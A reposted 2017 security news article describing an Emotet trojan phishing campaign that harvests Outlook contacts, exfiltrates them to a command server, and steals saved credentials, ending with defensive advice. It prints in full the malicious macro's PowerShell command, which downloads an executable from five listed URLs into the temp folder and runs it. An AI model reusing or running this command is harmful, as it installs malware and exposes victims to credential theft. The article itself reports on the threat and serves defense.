Emotet Trojan Reads Your Email, Uses it to Infect More Victims
July 29, 2017
Shah Sheikh (1294 articles)

Emotet Trojan Reads Your Email, Uses it to Infect More Victims

A new wave of Emotet trojan infections is spreading via phishing emails sent from compromised Outlook accounts.

At first glance, these appear to be a fairly run-of-the-mill phishing campaigns complete with booby-trapped Word documents disguised as invoices. But on further investigation, it appears Emotet is taking things a step further by scraping names and email addresses from victim Outlook accounts, then using that info to send out additional phishing emails from the compromised accounts. They include a link that downloads a malicious Word document.


These attacks rely on an Office macro hidden in the “invoice” Word doc to download the Emotet payload using a PowerShell command.

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://peerserv.com/kboaggx/,http://daosushiandthai.com/ut/,http://choosesccs.com/lwzmlyxyh/,http://mediac.org/j/,http://perlinskidesign.com/bweyjeli/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

Emotet has traditionally been recognized as a banking trojan, though in this case it appears to be serving as more of a general credential stealer and potentially a downloader for additional malware.

According to analysis from Fortinet, once it’s set up shop on an infected device, one of Emotet’s tasks is to scour the victim’s Microsoft Outlook account by reading the PST file, which stores email messages, calendar info, and more. It specifically hones in on any email messages with an unread status, and collects the sender name and email address from each unread message.

The stolen names and email addresses are stored in a temporary file, then encrypted and delivered to a command and control (C&C) server.

The C&C server responds by sending back the phishing email message along with the email addresses the message will be sent to. From there, Emotet utilizes SMTP protocol to send out the emails, keeping the campaign alive and spreading to new victims.

Emotet doesn’t stop there, however. It continues the attack on the original infected device by stealing additional account credentials, including but not limited to:

– Google accounts
– Office Outlook
– FTP accounts saved in IE
– MSN Messenger
– Google Talk
– IncrediMail
– Group Mail
– Mozilla Thunderbird

Researchers from Fidelis Security have also observed recent variants of Emotet exercising internal network propagation capabilities similar to the QakBot banking trojan.

Phishing emails disguised as fake invoices are nothing new, but when they look like they’re coming from a vendor your company actually does business with, they can be convincing.

If possible, consider disabling macros by default across your organization. Explain to users that when a document they download from an email asks them to enable macros or “enable content” that’s a major red flag.

Making sure AV is installed and up-to-date across your organization is another must, but for more complete protection you should also have endpoint protection that detects and blocks malicious behaviors.
Source | Barkly